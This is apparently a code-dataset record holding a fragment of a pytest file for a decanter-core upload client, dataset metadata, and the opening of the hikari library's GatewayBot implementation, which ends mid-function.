Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| 35.715789
| 93
| 0.703212
|
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| true
| true
|
f707ad48d655f5a1de6caf6b6c93f8f68adf554c
| 59,087
|
py
|
Python
|
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# cython: language_level=3
# Copyright (c) 2020 Nekokatt
# Copyright (c) 2021-present davfsa
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Basic implementation the components for a single-process bot."""
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# Calling asyncio.gather outside of a running event loop isn't safe and
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
# This seems to cause confusion for a lot of people, so lets add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
"""Basic auto-sharding bot implementation.
This is the class you will want to use to start, control, and build a bot
with.
Parameters
----------
token : builtins.str
The bot token to sign in with.
Other Parameters
----------------
allow_color : builtins.bool
Defaulting to `builtins.True`, this will enable coloured console logs
on any platform that is a TTY.
Setting a `"CLICOLOR"` environment variable to any **non `0`** value
will override this setting.
Users should consider this an advice to the application on whether it is
safe to show colours if possible or not. Since some terminals can be
awkward or not support features in a standard way, the option to
explicitly disable this is provided. See `force_color` for an
alternative.
banner : typing.Optional[builtins.str]
The package to search for a `banner.txt` in. Defaults to `"hikari"` for
the `"hikari/banner.txt"` banner.
Setting this to `builtins.None` will disable the banner being shown.
executor : typing.Optional[concurrent.futures.Executor]
Defaults to `builtins.None`. If non-`builtins.None`, then this executor
is used instead of the `concurrent.futures.ThreadPoolExecutor` attached
to the `asyncio.AbstractEventLoop` that the bot will run on. This
executor is used primarily for file-IO.
While mainly supporting the `concurrent.futures.ThreadPoolExecutor`
implementation in the standard lib, Hikari's file handling systems
should also work with `concurrent.futures.ProcessPoolExecutor`, which
relies on all objects used in IPC to be `pickle`able. Many third-party
libraries will not support this fully though, so your mileage may vary
on using ProcessPoolExecutor implementations with this parameter.
force_color : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then this application
will __force__ colour to be used in console-based output. Specifying a
`"CLICOLOR_FORCE"` environment variable with a non-`"0"` value will
override this setting.
cache_settings : typing.Optional[hikari.impl.config.CacheSettings]
Optional cache settings. If unspecified, will use the defaults.
http_settings : typing.Optional[hikari.impl.config.HTTPSettings]
Optional custom HTTP configuration settings to use. Allows you to
customise functionality such as whether SSL-verification is enabled,
what timeouts `aiohttp` should expect to use for requests, and behavior
regarding HTTP-redirects.
intents : hikari.intents.Intents
Defaults to `hikari.intents.Intents.ALL_UNPRIVILEGED`. This allows you
to change which intents your application will use on the gateway. This
can be used to control and change the types of events you will receive.
logs : typing.Union[builtins.None, LoggerLevel, typing.Dict[str, typing.Any]]
Defaults to `"INFO"`.
If `builtins.None`, then the Python logging system is left uninitialized
on startup, and you will need to configure it manually to view most
logs that are output by components of this library.
If one of the valid values in a `LoggerLevel`, then this will match a
call to `colorlog.basicConfig` (a facade for `logging.basicConfig` with
additional conduit for enabling coloured logging levels) with the
`level` kwarg matching this value.
If a `typing.Dict[str, typing.Any]` equivalent, then this value is
passed to `logging.config.dictConfig` to allow the user to provide a
specialized logging configuration of their choice. If any handlers are
defined in the dict, default handlers will not be setup.
As a side note, you can always opt to leave this on the default value
and then use an incremental `logging.config.dictConfig` that applies
any additional changes on top of the base configuration, if you prefer.
An example of can be found in the `Example` section.
Note that `"TRACE_HIKARI"` is a library-specific logging level
which is expected to be more verbose than `"DEBUG"`.
max_rate_limit : builtins.float
The max number of seconds to backoff for when rate limited. Anything
greater than this will instead raise an error.
This defaults to five minutes if left to the default value. This is to
stop potentially indefinitely waiting on an endpoint, which is almost
never what you want to do if giving a response to a user.
You can set this to `float("inf")` to disable this check entirely.
Note that this only applies to the REST API component that communicates
with Discord, and will not affect sharding or third party HTTP endpoints
that may be in use.
max_retries : typing.Optional[builtins.int]
Maximum number of times a request will be retried if
it fails with a `5xx` status. Defaults to 3 if set to `builtins.None`.
proxy_settings : typing.Optional[hikari.impl.config.ProxySettings]
Custom proxy settings to use with network-layer logic
in your application to get through an HTTP-proxy.
rest_url : typing.Optional[builtins.str]
Defaults to the Discord REST API URL if `builtins.None`. Can be
overridden if you are attempting to point to an unofficial endpoint, or
if you are attempting to mock/stub the Discord API for any reason.
Generally you do not want to change this.
!!! note
`force_color` will always take precedence over `allow_color`.
!!! note
Settings that control the gateway session are provided to the
`GatewayBot.run` and `GatewayBot.start` functions in this class. This is done
to allow you to contextually customise details such as sharding
configuration without having to re-initialize the entire application
each time.
Example
-------
Setting up logging using a dictionary configuration:
```py
import os
import hikari
# We want to make gateway logs output as DEBUG, and TRACE for all ratelimit content.
bot = hikari.GatewayBot(
token=os.environ["BOT_TOKEN"],
logs={
"version": 1,
"incremental": True,
"loggers": {
"hikari.gateway": {"level": "DEBUG"},
"hikari.ratelimits": {"level": "TRACE_HIKARI"},
},
},
)
```
"""
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
"""Dispatch an event.
Parameters
----------
event : hikari.events.base_events.Event
The event to dispatch.
Example
-------
We can dispatch custom events by first defining a class that
derives from `hikari.events.base_events.Event`.
```py
import attr
from hikari.traits import RESTAware
from hikari.events.base_events import Event
from hikari.users import User
from hikari.snowflakes import Snowflake
@attr.define()
class EveryoneMentionedEvent(Event):
app: RESTAware = attr.field()
author: User = attr.field()
'''The user who mentioned everyone.'''
content: str = attr.field()
'''The message that was sent.'''
message_id: Snowflake = attr.field()
'''The message ID.'''
channel_id: Snowflake = attr.field()
'''The channel ID.'''
```
We can then dispatch our event as we see fit.
```py
from hikari.events.messages import MessageCreateEvent
@bot.listen(MessageCreateEvent)
async def on_message(event):
if "@everyone" in event.content or "@here" in event.content:
event = EveryoneMentionedEvent(
author=event.author,
content=event.content,
message_id=event.id,
channel_id=event.channel_id,
)
bot.dispatch(event)
```
This event can be listened to elsewhere by subscribing to it with
`EventManager.subscribe`.
```py
@bot.listen(EveryoneMentionedEvent)
async def on_everyone_mentioned(event):
print(event.user, "just pinged everyone in", event.channel_id)
```
Returns
-------
asyncio.Future[typing.Any]
A future that can be optionally awaited. If awaited, the future
will complete once all corresponding event listeners have been
invoked. If not awaited, this will schedule the dispatch of the
events in the background for later.
See Also
--------
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
"""Get the listeners for a given event type, if there are any.
Parameters
----------
event_type : typing.Type[T]
The event type to look for.
`T` must be a subclass of `hikari.events.base_events.Event`.
polymorphic : builtins.bool
If `builtins.True`, this will also return the listeners of the
subclasses of the given event type. If `builtins.False`, then
only listeners for this class specifically are returned. The
default is `builtins.True`.
Returns
-------
typing.Collection[typing.Callable[[T], typing.Coroutine[typing.Any, typing.Any, builtins.None]]
A copy of the collection of listeners for the event. Will return
an empty collection if nothing is registered.
`T` must be a subclass of `hikari.events.base_events.Event`.
"""
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
"""Generate a decorator to subscribe a callback to an event type.
This is a second-order decorator.
Parameters
----------
event_type : typing.Optional[typing.Type[T]]
The event type to subscribe to. The implementation may allow this
to be undefined. If this is the case, the event type will be inferred
instead from the type hints on the function signature.
`T` must be a subclass of `hikari.events.base_events.Event`.
Returns
-------
typing.Callable[[T], T]
A decorator for a coroutine function that passes it to
`EventManager.subscribe` before returning the function
reference.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Print the banner.
This allows library vendors to override this behaviour, or choose to
inject their own "branding" on top of what hikari provides by default.
Normal users should not need to invoke this function, and can simply
change the `banner` argument passed to the constructor to manipulate
what is displayed.
Parameters
----------
banner : typing.Optional[builtins.str]
The package to find a `banner.txt` in.
allow_color : builtins.bool
A flag that allows advising whether to allow color if supported or
not. Can be overridden by setting a `"CLICOLOR"` environment
variable to a non-`"0"` string.
force_color : builtins.bool
A flag that allows forcing color to always be output, even if the
terminal device may not support it. Setting the `"CLICOLOR_FORCE"`
environment variable to a non-`"0"` string will override this.
!!! note
`force_color` will always take precedence over `allow_color`.
extra_args : typing.Optional[typing.Dict[builtins.str, builtins.str]]
If provided, extra $-substitutions to use when printing the banner.
Default substitutions can not be overwritten.
Raises
------
builtins.ValueError
If `extra_args` contains a default $-substitution.
"""
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
asyncio_debug : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then debugging is
enabled for the asyncio event loop in use.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
close_passed_executor : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, any custom
`concurrent.futures.Executor` passed to the constructor will be
shut down when the application terminates. This does not affect the
default executor associated with the event loop, and will not
do anything if you do not provide a custom executor to the
constructor.
close_loop : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, then once the bot
enters a state where all components have shut down permanently
during application shutdown, then all asyncgens and background tasks
will be destroyed, and the event loop will be shut down.
This will wait until all `hikari`-owned `aiohttp` connectors have
had time to attempt to shut down correctly (around 250ms), and on
Python 3.9 and newer, will also shut down the default event loop
executor too.
coroutine_tracking_depth : typing.Optional[builtins.int]
Defaults to `builtins.None`. If an integer value and supported by
the interpreter, then this many nested coroutine calls will be
tracked with their call origin state. This allows you to determine
where non-awaited coroutines may originate from, but generally you
do not want to leave this enabled for performance reasons.
enable_signal_handlers : typing.Optional[builtins.bool]
Defaults to `builtins.True` if this is started in the main thread.
If on a __non-Windows__ OS with builtin support for kernel-level
POSIX signals, then setting this to `builtins.True` will allow
treating keyboard interrupts and other OS signals to safely shut
down the application as calls to shut down the application properly
rather than just killing the process in a dirty state immediately.
You should leave this enabled unless you plan to implement your own
signal handling yourself.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
propagate_interrupts : builtins.bool
Defaults to `builtins.False`. If set to `builtins.True`, then any
internal `hikari.errors.HikariInterrupt` that is raises as a
result of catching an OS level signal will result in the
exception being rethrown once the application has closed. This can
allow you to use hikari signal handlers and still be able to
determine what kind of interrupt the application received after
it closes. When `builtins.False`, nothing is raised and the call
will terminate cleanly and silently where possible instead.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
# Throwing this in the handler will lead to lots of fun OS specific shenanigans. So, lets just
# cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
# We can't always safely intercept this either, as Windows does not allow us to use asyncio loop
# signal listeners (since Windows doesn't have kernel-level signals, only emulated system calls
# for a remote few standard C signal types). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
# We log native thread IDs purely for debugging purposes.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
# Signal handlers can only be registered on the main thread so we
# only default to True if this is the case.
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
# Signal not implemented probably. We should have logged this earlier.
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
